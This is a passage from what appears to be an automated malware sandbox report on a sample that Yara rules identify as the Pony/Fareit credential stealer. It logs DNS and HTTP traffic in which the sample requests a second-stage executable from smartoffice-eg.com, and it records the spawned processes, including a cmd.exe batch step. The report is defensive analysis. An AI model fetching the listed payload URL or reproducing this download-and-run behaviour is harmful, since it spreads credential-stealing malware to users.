Apr 23, 2024 21:47:30.707003117 CEST	80	49730	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.707020998 CEST	80	49730	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.707091093 CEST	49730	80	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.711123943 CEST	49730	80	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.723572969 CEST	49731	443	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.723620892 CEST	443	49731	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.723702908 CEST	49731	443	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.723731995 CEST	49731	443	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.723737955 CEST	443	49731	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.723995924 CEST	443	49731	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.920188904 CEST	80	49730	144.76.41.117	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 21:47:29.680064917 CEST	61816	53	192.168.2.4	1.1.1.1
Apr 23, 2024 21:47:30.284951925 CEST	53	61816	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 21:47:29.680064917 CEST	192.168.2.4	1.1.1.1	0x8b7d	Standard query (0)	smartoffice-eg.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 21:47:30.284951925 CEST	1.1.1.1	192.168.2.4	0x8b7d	No error (0)	smartoffice-eg.com		144.76.41.117	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

smartoffice-eg.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	144.76.41.117	80	5904	C:\Users\user\Desktop\BW38j8Jkbl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 21:47:30.497908115 CEST	191	OUT	GET /include/rili/shit.exe HTTP/1.0 Host: smartoffice-eg.com Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Apr 23, 2024 21:47:30.707003117 CEST	488	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Apr 2024 19:47:30 GMT Server: Apache Location: https://smartoffice-eg.com/include/rili/shit.exe Content-Length: 256 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6d 61 72 74 6f 66 66 69 63 65 2d 65 67 2e 63 6f 6d 2f 69 6e 63 6c 75 64 65 2f 72 69 6c 69 2f 73 68 69 74 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://smartoffice-eg.com/include/rili/shit.exe">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	144.76.41.117	443	5904	C:\Users\user\Desktop\BW38j8Jkbl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 21:47:30.723731995 CEST	191	OUT	GET /include/rili/shit.exe HTTP/1.0 Host: smartoffice-eg.com Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Target ID:	0
Start time:	21:47:20
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\BW38j8Jkbl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BW38j8Jkbl.exe"
Imagebase:	0x400000
File size:	634'880 bytes
MD5 hash:	2392A10406F41B602ACBBDBBB24E0FF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Fareit, Description: Fareit Payload, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	21:47:27
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\BW38j8Jkbl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BW38j8Jkbl.exe"
Imagebase:	0x400000
File size:	634'880 bytes
MD5 hash:	2392A10406F41B602ACBBDBBB24E0FF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Fareit, Description: Fareit Payload, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	21:47:30
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	21:47:30
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true